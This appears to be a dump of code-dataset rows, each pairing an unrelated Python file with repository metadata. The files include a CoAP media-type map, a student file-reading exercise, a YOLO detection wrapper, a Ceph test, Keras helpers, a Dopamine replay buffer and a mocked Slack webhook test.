44: 'application/soap+xml',
45: 'application/atom+xml',
46: 'application/xmpp+xml',
47: 'application/exi',
48: 'application/x-bxml',
49: 'application/fastinfoset',
50: 'application/json',
1541 : 'application/vnd.oma.lwm2m+text',
1542 : 'application/vnd.oma.lwm2m+tlv',
1543 : 'application/vnd.oma.lwm2m+json',
1544 : 'application/vnd.oma.lwm2m+opaque'}
"""A map from CoAP-assigned integral codes to Internet media type descriptions."""
media_types_rev = dict(zip(media_types.itervalues(), media_types.iterkeys()))
"""A map from Internet media type descriptions to the corresponding
CoAP-assigned integral code."""
| 34.160494 | 82 | 0.613119 | 698 | 5,534 | 4.80086 | 0.43553 | 0.016115 | 0.028648 | 0.026261 | 0.075201 | 0.060877 | 0.060877 | 0.060877 | 0.060877 | 0.060877 | 0 | 0.090303 | 0.295627 | 5,534 | 161 | 83 | 34.372671 | 0.769369 | 0.286773 | 0 | 0 | 0 | 0 | 0.262718 | 0.072513 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d11cf3e20022175afbe88d52fde2ebd6a82eea9a | 2,879 | py | Python | Python-for-Data-Science/code.py | hirani22/greyatom-python-for-data-science | 17890457d27c33c4eedce23479c0ee2e158674c7 | [
"MIT"
] | null | null | null | Python-for-Data-Science/code.py | hirani22/greyatom-python-for-data-science | 17890457d27c33c4eedce23479c0ee2e158674c7 | [
"MIT"
] | null | null | null | Python-for-Data-Science/code.py | hirani22/greyatom-python-for-data-science | 17890457d27c33c4eedce23479c0ee2e158674c7 | [
"MIT"
] | null | null | null | # --------------
#Code starts here
#Function to read file
def read_file(path):
file = open(path,'r')
sentence= file.read()
file.close
return sentence
#Opening of the file located in the path in 'read' mode
#Reading of the first line of the file and storing it in a variable
#Closing of the file
#Returning the first line of the file
#Calling the function to read file
sample_message= read_file(file_path)
#Printing the line of the file
print(sample_message)
message_1= read_file(file_path_1)
message_2= read_file(file_path_2)
print(message_1)
print(message_2)
#Function to fuse message
def fuse_msg(message_a,message_b):
quotient=int(message_b)//int(message_a)
return str(quotient)
secret_msg_1=fuse_msg(message_1,message_2)
print(secret_msg_1)
#Calling the function to read file
message_3=read_file(file_path_3)
#Calling the function to read file
print(message_3)
#Function to substitute the message
def substitute_msg(message_c):
if(message_c=="Red"):
sub="Army General"
elif(message_c=="Green"):
sub="Data Scientist"
elif(message_c=="Blue"):
sub="Marine Biologist"
return sub
#Calling the function to read file
secret_msg_2= substitute_msg(message_3)
print(secret_msg_2)
message_4=read_file(file_path_4)
message_5=read_file(file_path_5)
print(message_4)
print(message_5)
#Function to compare message
def compare_msg(message_d,message_e):
a_list= message_d.split()
b_list= message_e.split()
#Comparing the elements from both the lists
c_list=[]
for i in a_list:
if i not in b_list:
c_list.append(i)
final_msg=" ".join(c_list)
return final_msg
secret_msg_3=compare_msg(message_4,message_5)
print(secret_msg_3)
#Calling the function to read file
message_6=read_file(file_path_6)
print(message_6)
#Function to filter message
def extract_msg(message_f):
a_list=message_f.split()
even_word=lambda x:len(x)%2==0
b_list= list(filter(even_word, a_list))
final_msg= " ".join(b_list)
return final_msg
#Calling the function to read file
secret_msg_4=extract_msg(message_6)
print(secret_msg_4)
#Secret message parts in the correct order
message_parts=[secret_msg_3, secret_msg_1, secret_msg_4, secret_msg_2]
secret_msg=" ".join(message_parts)
# define the path where you
final_path= user_data_dir + '/secret_message.txt'
#Combine the secret message parts into a single complete secret message
#Function to write inside a file
def write_file(secret_msg,path):
file=open(final_path, 'a+')
file.write(secret_msg)
file.close()
write_file(secret_msg, final_path)
print(secret_msg)
#Calling the function to write inside the file
#Printing the entire secret message
#Code ends here
| 24.818966 | 72 | 0.712053 | 460 | 2,879 | 4.197826 | 0.226087 | 0.079234 | 0.050751 | 0.065251 | 0.139824 | 0.126359 | 0.090109 | 0.038322 | 0 | 0 | 0 | 0.016515 | 0.200764 | 2,879 | 115 | 73 | 25.034783 | 0.822686 | 0.303578 | 0 | 0.032258 | 0 | 0 | 0.042359 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.096774 | false | 0 | 0 | 0 | 0.177419 | 0.193548 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d11d6247f15795a00b7ddaf410341128ee666804 | 2,259 | py | Python | python/carView/yolo4tiny/yololib.py | ai-driver-III/AI-Driver | 3bae140980507543dd735abbca4aea57a682a2fc | [
"MIT"
] | null | null | null | python/carView/yolo4tiny/yololib.py | ai-driver-III/AI-Driver | 3bae140980507543dd735abbca4aea57a682a2fc | [
"MIT"
] | null | null | null | python/carView/yolo4tiny/yololib.py | ai-driver-III/AI-Driver | 3bae140980507543dd735abbca4aea57a682a2fc | [
"MIT"
] | null | null | null | import cv2
import numpy as np
import multiprocessing as mp
class Yoylv4Tiny():
def __init__(self):
CONFIG = 'python/carView/yolo4tiny/yolov4-tiny.cfg'
WEIGHT = 'python/carView/yolo4tiny/yolov4-tiny.weights'
NAMES = 'python/carView/yolo4tiny/coco.names'
# 讀取物件名稱以及設定外框顏色
with open(NAMES, 'r') as f:
names = [line.strip() for line in f.readlines()]
colors = np.random.uniform(0, 255, size=(len(names), 3))
# 設定神經網路
net = cv2.dnn.readNet(CONFIG, WEIGHT)
model = cv2.dnn_DetectionModel(net)
model.setInputParams(size=(416, 416), scale=1/255.0)
# YOLO 要對調顏色
model.setInputSwapRB(True)
self.model = model
self.names = names
self.colors = colors
# return model, names, colors
def nnProcess(self, image, model=None):
if model==None:
model = self.model
classes, confs, boxes = model.detect(image, 0.6, 0.3)
objPts = []
for box in boxes:
x, y, w , h = box
objPts.append([x+w/2, y+h])
return classes, confs, boxes, objPts
def drawBox(self, image, classes, confs, boxes, names=None, colors=None):
if names==None:
names = self.names
if colors==None:
colors = self.colors
new_image = image.copy()
for (classid, conf, box) in zip(classes, confs, boxes):
x, y, w , h = box
label = '{}: {:.2f}'.format(names[int(classid)], float(conf))
color = colors[int(classid)]
cv2.rectangle(new_image, (x, y), (x + w, y + h), color, 2)
cv2.putText(new_image, label, (x, y - 10),
cv2.FONT_HERSHEY_SIMPLEX, 0.7, color, 2
)
return new_image
def getObjectInfo(self, classes, confs, boxs, names=None):
if names==None:
names = self.names
returnLabel = []
returnBox = []
for (classid, conf, box) in zip(classes, confs, boxs):
x, y, w, h = box
label = '{}#{:.2f}'.format(names[int(classid)], float(conf))
returnLabel.append(label)
returnBox.append([x, y, w, h])
return returnLabel, returnBox
| 35.857143 | 77 | 0.550243 | 277 | 2,259 | 4.447653 | 0.34657 | 0.058442 | 0.055195 | 0.012987 | 0.239448 | 0.1875 | 0.173701 | 0.126623 | 0.071429 | 0.071429 | 0 | 0.026728 | 0.320938 | 2,259 | 62 | 78 | 36.435484 | 0.776402 | 0.02656 | 0 | 0.132075 | 0 | 0 | 0.063355 | 0.054239 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075472 | false | 0 | 0.056604 | 0 | 0.207547 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d11e68168c063438274762d27c8b448191016095 | 2,127 | py | Python | tests/cephfs/cephfs_vol_management/cephfs_vol_mgmt_create_vol_component_exist_name.py | julpark-rh/cephci | 3796668e8dcfc5851f387c47ff0b459d495a40c7 | [
"MIT"
] | null | null | null | tests/cephfs/cephfs_vol_management/cephfs_vol_mgmt_create_vol_component_exist_name.py | julpark-rh/cephci | 3796668e8dcfc5851f387c47ff0b459d495a40c7 | [
"MIT"
] | null | null | null | tests/cephfs/cephfs_vol_management/cephfs_vol_mgmt_create_vol_component_exist_name.py | julpark-rh/cephci | 3796668e8dcfc5851f387c47ff0b459d495a40c7 | [
"MIT"
] | null | null | null | import random
import string
import traceback
from tests.cephfs.cephfs_utilsV1 import FsUtils
from utility.log import Log
log = Log(__name__)
def run(ceph_cluster, **kw):
"""
pre-requisites:
1. Create a volume with a name
2. Create a subvolume with a name
3. Create a subvolume group with a name
Test operation:
1. Try to create a volume with the same name
2. Try to create a subvolume with the same name
3. Try to create a subvolume group with the same name
"""
try:
tc = "CEPH-83573428"
log.info(f"Running CephFS tests for BZ-{tc}")
fs_util = FsUtils(ceph_cluster)
config = kw.get("config")
build = config.get("build", config.get("rhbuild"))
clients = ceph_cluster.get_ceph_objects("client")
client1 = clients[0]
fs_details = fs_util.get_fs_info(client1)
if not fs_details:
fs_util.create_fs(client1, "cephfs")
fs_util.auth_list([client1])
fs_util.prepare_clients(clients, build)
random_name = "".join(
random.choice(string.ascii_lowercase + string.digits)
for _ in list(range(5))
)
volume_name = "vol_01" + random_name
subvolume_name = "subvol_01" + random_name
subvolume_group_name = "subvol_group_name_01" + random_name
log.info("Ceph Build number is " + build[0])
fs_util.create_fs(client1, volume_name)
fs_util.create_subvolume(client1, volume_name, subvolume_name)
fs_util.create_subvolumegroup(client1, "cephfs", subvolume_group_name)
output1, err1 = fs_util.create_fs(client1, volume_name, check_ec=False)
output2, err2 = fs_util.create_subvolume(
client1, volume_name, subvolume_name, check_ec=False
)
output3, err3 = fs_util.create_subvolumegroup(
client1, volume_name, subvolume_name, check_ec=False
)
if output1 == 0 or output2 == 0 or output3 == 0:
return 1
return 0
except Exception as e:
log.error(e)
log.error(traceback.format_exc())
return 1
| 33.761905 | 79 | 0.64504 | 287 | 2,127 | 4.560976 | 0.313589 | 0.05042 | 0.064171 | 0.027502 | 0.285714 | 0.166539 | 0.166539 | 0.119175 | 0.077922 | 0 | 0 | 0.031471 | 0.267983 | 2,127 | 62 | 80 | 34.306452 | 0.809249 | 0.133051 | 0 | 0.088889 | 0 | 0 | 0.076111 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022222 | false | 0 | 0.111111 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d11ee570cc3720e38a308e37c6f8014f32e2bc28 | 2,611 | py | Python | src/misc.py | telemachosc/Face-Recognition | 60c57ad1f7f294ea37be71ae4c73f44ff408e03d | [
"MIT"
] | null | null | null | src/misc.py | telemachosc/Face-Recognition | 60c57ad1f7f294ea37be71ae4c73f44ff408e03d | [
"MIT"
] | null | null | null | src/misc.py | telemachosc/Face-Recognition | 60c57ad1f7f294ea37be71ae4c73f44ff408e03d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Wed Jun 9 12:52:38 2021
@author: telemachos
Miscellaneous functions used when training a model
"""
import json
import os
import numpy as np
from keras.callbacks import LearningRateScheduler
class StrIntEncoder:
@staticmethod
def encode(s: str) -> int:
encode = s.encode('utf-8')
return int.from_bytes(encode, byteorder='big')
@staticmethod
def decode(i: int) -> str:
tobytes = i.to_bytes(((i.bit_length() + 7) // 8), byteorder='big')
return tobytes.decode("utf-8")
def file_exists(name: str) -> str:
if os.path.exists('results/'+name+'.txt'):
ds, num = name.split('_')
hfname = ds+'_'+str(int(num)+1).zfill(3)
if os.path.exists('results/'+hfname+'.txt'):
hfname = file_exists(hfname)
else:
hfname = name
return hfname
def write_history(name: str, h: dict, test_set: list, time: float,
epoch, lr, fnl) -> None:
name = file_exists(name)
with open('results/'+name+'.txt', 'w') as convert_file:
convert_file.write(('-----------------------------------------------'+
'-------------------------------\n'))
convert_file.write(f'{name} EXPERIMENT RESULTS\n')
convert_file.write(('-----------------------------------------------'+
'-------------------------------\n'))
convert_file.write(('Train configuration for that experiment was:\n'+
f'Epochs: {epoch},\nLearning rate: {lr},\n'+
f'Fine tune layers: {fnl}'))
convert_file.write(('Loss and accuracy on train and validation set\n'))
convert_file.write(json.dumps(h, indent=2))
convert_file.write(('\n\n'+
'----------------------------------------------\n'))
convert_file.write('On the test set the loss and accuracy was:\n')
convert_file.write(f'loss: {test_set[0]}, \naccuracy: {test_set[1]}\n')
convert_file.write(('---------------------------------------------\n'+
'\nTotal time for training and evaluating the '+
f'model was\n{time} seconds or {time/60} minutes'))
def step_decay_schedule(initial_lr=1e-3, decay_factor=0.75, step_size=10):
'''
Wrapper function to create a LearningRateScheduler with step decay schedule.
'''
def schedule(epoch):
return initial_lr * (decay_factor ** np.floor(epoch/step_size))
return LearningRateScheduler(schedule) | 34.813333 | 80 | 0.522022 | 298 | 2,611 | 4.469799 | 0.419463 | 0.090841 | 0.12012 | 0.089339 | 0.10961 | 0.04955 | 0.04955 | 0 | 0 | 0 | 0 | 0.015496 | 0.258522 | 2,611 | 75 | 81 | 34.813333 | 0.672521 | 0.079663 | 0 | 0.12766 | 0 | 0 | 0.285714 | 0.107143 | 0 | 0 | 0 | 0 | 0 | 1 | 0.12766 | false | 0 | 0.085106 | 0.021277 | 0.340426 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d11f0cfd3773469157b52836b08d42b4f17063f4 | 16,873 | py | Python | dopamine/replay_memory/off_policy_replay_buffer.py | pmineiro/dopamine | 6f6077f38d6b2520272dfcf4ec36225d53c17eae | [
"Apache-2.0"
] | null | null | null | dopamine/replay_memory/off_policy_replay_buffer.py | pmineiro/dopamine | 6f6077f38d6b2520272dfcf4ec36225d53c17eae | [
"Apache-2.0"
] | null | null | null | dopamine/replay_memory/off_policy_replay_buffer.py | pmineiro/dopamine | 6f6077f38d6b2520272dfcf4ec36225d53c17eae | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
"""The standard DQN replay memory + logged probabilities + return vectors/tensors so we can do cool stuff with them
This implementation is an out-of-graph replay memory + in-graph wrapper
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import gzip
import math
import os
import pickle
from absl import logging
import numpy as np
import tensorflow as tf
import gin.tf
from dopamine.replay_memory import circular_replay_buffer
from dopamine.replay_memory.circular_replay_buffer import ReplayElement, STORE_FILENAME_PREFIX, CHECKPOINT_DURATION, invalid_range
@gin.configurable
class OutOfGraphOffPolicyReplayBuffer(circular_replay_buffer.OutOfGraphReplayBuffer):
"""An out-of-graph Replay Buffer with logged probabilities and support for off-policy stuff.
See circular_replay_buffer.py for details.
"""
def __init__(self,
observation_shape,
stack_size,
replay_capacity,
batch_size,
update_horizon=1,
gamma=0.99,
max_sample_attempts=1000,
extra_storage_types=None,
observation_dtype=np.uint8,
terminal_dtype=np.uint8,
action_shape=(),
action_dtype=np.int32,
reward_shape=(),
reward_dtype=np.float32,
subsample_percentage=None,
subsample_seed=None):
"""Initializes OutOfGraphOffPolicyReplayBuffer.
Args:
observation_shape: tuple of ints.
stack_size: int, number of frames to use in state stack.
replay_capacity: int, number of transitions to keep in memory.
batch_size: int.
update_horizon: int, length of update ('n' in n-step update).
gamma: int, the discount factor.
max_sample_attempts: int, the maximum number of attempts allowed to
get a sample.
extra_storage_types: list of ReplayElements defining the type of the extra
contents that will be stored and returned by sample_transition_batch.
observation_dtype: np.dtype, type of the observations. Defaults to
np.uint8 for Atari 2600.
terminal_dtype: np.dtype, type of the terminals. Defaults to np.uint8 for
Atari 2600.
action_shape: tuple of ints, the shape for the action vector. Empty tuple
means the action is a scalar.
action_dtype: np.dtype, type of elements in the action.
reward_shape: tuple of ints, the shape of the reward vector. Empty tuple
means the reward is a scalar.
reward_dtype: np.dtype, type of elements in the reward.
subsample_percentage: only use x% of the buffer
"""
super(OutOfGraphOffPolicyReplayBuffer, self).__init__(
observation_shape=observation_shape,
stack_size=stack_size,
replay_capacity=replay_capacity,
batch_size=batch_size,
update_horizon=update_horizon,
gamma=gamma,
max_sample_attempts=max_sample_attempts,
extra_storage_types=extra_storage_types,
observation_dtype=observation_dtype,
terminal_dtype=terminal_dtype,
action_shape=action_shape,
action_dtype=action_dtype,
reward_shape=reward_shape,
reward_dtype=reward_dtype)
self._subsample_percentage = None if subsample_percentage is None else int(subsample_percentage)
logging.info('\t subsample percentage: %s', str(self._subsample_percentage))
assert self._subsample_percentage is None or self._subsample_percentage > 0
self._subsample_seed = subsample_seed
# wmax has not been checkpointed.
# If we try to keep track of it here, batch_rl complains it cannot find a checkpoint
# self.wmax = 2
def get_add_args_signature(self):
"""The signature of the add function.
The signature is the same as the one for OutOfGraphReplayBuffer, with an
added probability.
Returns:
list of ReplayElements defining the type of the argument signature needed
by the add function.
"""
parent_add_signature = super(OutOfGraphOffPolicyReplayBuffer,
self).get_add_args_signature()
add_signature = parent_add_signature + [
ReplayElement('prob', (), np.float32)
]
return add_signature
def _add(self, *args):
self._check_args_length(*args)
transition = {}
for i, element in enumerate(self.get_add_args_signature()):
# commented out because wmax was not checkpointed
# if element.name == 'prob':
# prob = args[i]
transition[element.name] = args[i]
# commented out because wmax was not checkpointed
#self.wmax = max(self.wmax, 1.0/prob)
super(OutOfGraphOffPolicyReplayBuffer, self)._add_transition(transition)
def get_transition_elements(self, batch_size=None):
"""Returns a 'type signature' for sample_transition_batch.
Args:
batch_size: int, number of transitions returned. If None, the default
batch_size will be used.
Returns:
signature: A namedtuple describing the method's return type signature.
"""
parent_transition_type = (
super(OutOfGraphOffPolicyReplayBuffer,
self).get_transition_elements(batch_size))
update_horizon = self._update_horizon
batch_size = self._batch_size if batch_size is None else batch_size
trajectory_type = [
ReplayElement('traj_state', (batch_size, update_horizon) + self._state_shape, self._observation_dtype),
ReplayElement('traj_action', (batch_size, update_horizon), np.int32),
ReplayElement('traj_reward', (batch_size, update_horizon), np.float32),
ReplayElement('traj_prob', (batch_size, update_horizon), np.float32),
ReplayElement('traj_discount', (batch_size, update_horizon), np.float32),
]
return parent_transition_type + trajectory_type
def sample_index_batch(self, batch_size):
"""Returns a batch of valid indices sampled uniformly.
Args:
batch_size: int, number of indices returned.
Returns:
list of ints, a batch of valid indices sampled uniformly.
Raises:
RuntimeError: If the batch was not constructed after maximum number of
tries.
"""
if self.is_full():
# add_count >= self._replay_capacity > self._stack_size
min_id = self.cursor() - self._replay_capacity + self._stack_size - 1
max_id = self.cursor() - self._update_horizon
else:
# add_count < self._replay_capacity
min_id = self._stack_size - 1
max_id = self.cursor() - self._update_horizon
if max_id <= min_id:
raise RuntimeError('Cannot sample a batch with fewer than stack size '
'({}) + update_horizon ({}) transitions.'.
format(self._stack_size, self._update_horizon))
indices = []
attempt_count = 0
while (len(indices) < batch_size and
attempt_count < self._max_sample_attempts):
index = np.random.randint(min_id, max_id) % self._replay_capacity
if self._subsample_percentage is not None:
def hashit(v):
v = (((v >> 16) ^ v) * 0x119de1f3) % (1 << 31)
v = (((v >> 16) ^ v) * 0x119de1f3) % (1 << 31)
v = ((v >> 16) ^ v) % (1 << 31)
return v
def hashitseed(v, seed):
return hashit(v + hashit(seed))
hashindex = hashitseed(index, int(self._subsample_seed))
while hashindex % 100 >= self._subsample_percentage:
index = np.random.randint(min_id, max_id) % self._replay_capacity
hashindex = hashitseed(index, int(self._subsample_seed))
if self.is_valid_transition(index):
indices.append(index)
else:
attempt_count += 1
if len(indices) != batch_size:
raise RuntimeError(
'Max sample attempts: Tried {} times but only sampled {}'
' valid indices. Batch size is {}'.
format(self._max_sample_attempts, len(indices), batch_size))
return indices
def sample_transition_batch(self, batch_size=None, indices=None):
"""Returns a batch of transitions (including any extra contents).
If get_transition_elements has been overridden and defines elements not
stored in self._store, an empty array will be returned and it will be
left to the child class to fill it. For example, for the child class
OutOfGraphPrioritizedReplayBuffer, the contents of the
sampling_probabilities are stored separately in a sum tree.
When the transition is terminal next_state_batch has undefined contents.
NOTE: This transition contains the indices of the sampled elements. These
are only valid during the call to sample_transition_batch, i.e. they may
be used by subclasses of this replay buffer but may point to different data
as soon as sampling is done.
Args:
batch_size: int, number of transitions returned. If None, the default
batch_size will be used.
indices: None or list of ints, the indices of every transition in the
batch. If None, sample the indices uniformly.
Returns:
transition_batch: tuple of np.arrays with the shape and type as in
get_transition_elements().
Raises:
ValueError: If an element to be sampled is missing from the replay buffer.
"""
if batch_size is None:
batch_size = self._batch_size
if indices is None:
indices = self.sample_index_batch(batch_size)
assert len(indices) == batch_size
transition_elements = self.get_transition_elements(batch_size)
batch_arrays = self._create_batch_arrays(batch_size)
for batch_element, state_index in enumerate(indices):
trajectory_indices = [(state_index + j) % self._replay_capacity
for j in range(self._update_horizon)]
trajectory_terminals = self._store['terminal'][trajectory_indices]
is_terminal_transition = trajectory_terminals.any()
if not is_terminal_transition:
trajectory_length = self._update_horizon
else:
# np.argmax of a bool array returns the index of the first True.
trajectory_length = np.argmax(trajectory_terminals.astype(np.bool),
0) + 1
next_state_index = state_index + trajectory_length
trajectory_discount_vector = (
self._cumulative_discount_vector[:trajectory_length])
trajectory_states = np.array([self.get_observation_stack(i) for i in trajectory_indices[:trajectory_length]])
trajectory_actions = self.get_range(self._store['action'], state_index,
next_state_index)
trajectory_rewards = self.get_range(self._store['reward'], state_index,
next_state_index)
trajectory_probs = self.get_range(self._store['prob'], state_index,
next_state_index)
# Fill the contents of each array in the sampled batch.
assert len(transition_elements) == len(batch_arrays)
for element_array, element in zip(batch_arrays, transition_elements):
if element.name == 'traj_state':
element_array[batch_element, :trajectory_length] = trajectory_states
element_array[batch_element, trajectory_length:] = 0
elif element.name == 'traj_action':
element_array[batch_element, :trajectory_length] = trajectory_actions
element_array[batch_element, trajectory_length:] = 0
elif element.name == 'traj_reward':
element_array[batch_element, :trajectory_length] = trajectory_rewards
element_array[batch_element, trajectory_length:] = 0
elif element.name == 'traj_prob':
element_array[batch_element,:trajectory_length] = trajectory_probs
element_array[batch_element,trajectory_length:] = 1
elif element.name == 'traj_discount':
element_array[batch_element,:trajectory_length] = trajectory_discount_vector
element_array[batch_element,trajectory_length:] = 0
elif element.name == 'state':
element_array[batch_element] = self.get_observation_stack(state_index)
elif element.name == 'reward':
# compute the discounted sum of rewards in the trajectory.
element_array[batch_element] = np.sum(
trajectory_discount_vector * trajectory_rewards, axis=0)
elif element.name == 'next_state':
element_array[batch_element] = self.get_observation_stack(
(next_state_index) % self._replay_capacity)
elif element.name in ('next_action', 'next_reward'):
element_array[batch_element] = (
self._store[element.name.lstrip('next_')][(next_state_index) %
self._replay_capacity])
elif element.name == 'terminal':
element_array[batch_element] = is_terminal_transition
elif element.name == 'indices':
element_array[batch_element] = state_index
elif element.name in self._store.keys():
element_array[batch_element] = (
self._store[element.name][state_index])
# We assume the other elements are filled in by the subclass.
return batch_arrays
@gin.configurable(blacklist=['observation_shape', 'stack_size',
'update_horizon', 'gamma'])
class WrappedOffPolicyReplayBuffer(
circular_replay_buffer.WrappedReplayBuffer):
"""Wrapper of OutOfGraphOffPolicyReplayBuffer with in-graph sampling.
Usage:
* To add a transition: Call the add function.
* To sample a batch: Query any of the tensors in the transition dictionary.
Every sess.run that requires any of these tensors will
sample a new transition.
"""
def __init__(self,
observation_shape,
stack_size,
use_staging=False,
replay_capacity=1000000,
batch_size=32,
update_horizon=1,
gamma=0.99,
wrapped_memory=None,
max_sample_attempts=1000,
extra_storage_types=None,
observation_dtype=np.uint8,
terminal_dtype=np.uint8,
action_shape=(),
action_dtype=np.int32,
reward_shape=(),
reward_dtype=np.float32):
"""Initializes WrappedOffPolicyReplayBuffer.
Args:
observation_shape: tuple of ints.
stack_size: int, number of frames to use in state stack.
use_staging: bool, when True it would use a staging area to prefetch
the next sampling batch.
replay_capacity: int, number of transitions to keep in memory.
batch_size: int.
update_horizon: int, length of update ('n' in n-step update).
gamma: int, the discount factor.
wrapped_memory: The 'inner' memory data structure. If None, use the
default prioritized replay.
max_sample_attempts: int, the maximum number of attempts allowed to
get a sample.
extra_storage_types: list of ReplayElements defining the type of the extra
contents that will be stored and returned by sample_transition_batch.
observation_dtype: np.dtype, type of the observations. Defaults to
np.uint8 for Atari 2600.
terminal_dtype: np.dtype, type of the terminals. Defaults to np.uint8 for
Atari 2600.
action_shape: tuple of ints, the shape for the action vector. Empty tuple
means the action is a scalar.
action_dtype: np.dtype, type of elements in the action.
reward_shape: tuple of ints, the shape of the reward vector. Empty tuple
means the reward is a scalar.
reward_dtype: np.dtype, type of elements in the reward.
Raises:
ValueError: If update_horizon is not positive.
ValueError: If discount factor is not in [0, 1].
"""
if wrapped_memory is None:
wrapped_memory = OutOfGraphOffPolicyReplayBuffer(
observation_shape, stack_size, replay_capacity, batch_size,
update_horizon, gamma, max_sample_attempts,
extra_storage_types=extra_storage_types,
observation_dtype=observation_dtype)
super(WrappedOffPolicyReplayBuffer, self).__init__(
observation_shape,
stack_size,
use_staging,
replay_capacity,
batch_size,
update_horizon,
gamma,
wrapped_memory=wrapped_memory,
extra_storage_types=extra_storage_types,
observation_dtype=observation_dtype,
terminal_dtype=terminal_dtype,
action_shape=action_shape,
action_dtype=action_dtype,
reward_shape=reward_shape,
reward_dtype=reward_dtype)
| 41.661728 | 130 | 0.673502 | 2,062 | 16,873 | 5.265276 | 0.154219 | 0.030671 | 0.026619 | 0.037579 | 0.449572 | 0.410611 | 0.3734 | 0.319517 | 0.298886 | 0.280648 | 0 | 0.009239 | 0.255912 | 16,873 | 404 | 131 | 41.764851 | 0.855516 | 0.339951 | 0 | 0.288889 | 0 | 0 | 0.041854 | 0 | 0 | 0 | 0.001873 | 0 | 0.013333 | 1 | 0.04 | false | 0 | 0.062222 | 0.004444 | 0.137778 | 0.004444 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d1236c762490740a9e18dacf8a02df19f37f0070 | 1,376 | py | Python | tests/test_libslack.py | umccr/libumccr | e08ca1fdf8db72d6ea6e17442dc1bf1fb304243d | [
"MIT"
] | null | null | null | tests/test_libslack.py | umccr/libumccr | e08ca1fdf8db72d6ea6e17442dc1bf1fb304243d | [
"MIT"
] | 5 | 2021-11-04T03:15:37.000Z | 2021-11-04T03:32:32.000Z | tests/test_libslack.py | umccr/libumccr | e08ca1fdf8db72d6ea6e17442dc1bf1fb304243d | [
"MIT"
] | null | null | null | import os
from datetime import datetime
from unittest import TestCase
from mockito import when, mock, verify, unstub
from libumccr import libslack
class LibSlackUnitTests(TestCase):
def setUp(self) -> None:
os.environ['SLACK_CHANNEL'] = "#mock"
def tearDown(self) -> None:
del os.environ['SLACK_CHANNEL']
unstub()
def test_call_slack_webhook(self):
"""
python -m unittest tests.test_libslack.LibSlackUnitTests.test_call_slack_webhook
"""
mock_sender = "mock sender"
mock_topic = "mock topic"
mock_attachments = [
{
"title": "mock attachement",
"text": "test",
},
{
"title": "datetime",
"text": str(datetime.now()),
},
]
mock_response = mock(libslack.http.client.HTTPResponse)
mock_response.status = 200
when(libslack.libssm).get_ssm_param(...).thenReturn("mock_webhook_id_123")
when(libslack.http.client.HTTPSConnection).request(...).thenReturn('ok')
when(libslack.http.client.HTTPSConnection).getresponse(...).thenReturn(mock_response)
status = libslack.call_slack_webhook(mock_sender, mock_topic, mock_attachments)
self.assertEqual(200, status)
verify(libslack.libssm, times=1).get_ssm_param(...)
| 30.577778 | 93 | 0.618459 | 143 | 1,376 | 5.762238 | 0.405594 | 0.032767 | 0.058252 | 0.050971 | 0.196602 | 0.072816 | 0 | 0 | 0 | 0 | 0 | 0.009891 | 0.265262 | 1,376 | 44 | 94 | 31.272727 | 0.805143 | 0.05814 | 0 | 0 | 0 | 0 | 0.093553 | 0 | 0 | 0 | 0 | 0 | 0.03125 | 1 | 0.09375 | false | 0 | 0.15625 | 0 | 0.28125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d125096efcca0b9a0a62af6753f16babc40c446a | 6,134 | py | Python | doajtest/unit/test_bll_delete_application.py | gaybro8777/doaj | 27d9d98ce4f496ae52acbaba6ee8e42c84cf1a58 | [
"Apache-2.0"
] | 47 | 2015-04-24T13:13:39.000Z | 2022-03-06T03:22:42.000Z | doajtest/unit/test_bll_delete_application.py | gaybro8777/doaj | 27d9d98ce4f496ae52acbaba6ee8e42c84cf1a58 | [
"Apache-2.0"
] | 1,215 | 2015-01-02T14:29:38.000Z | 2022-03-28T14:19:13.000Z | doajtest/unit/test_bll_delete_application.py | gaybro8777/doaj | 27d9d98ce4f496ae52acbaba6ee8e42c84cf1a58 | [
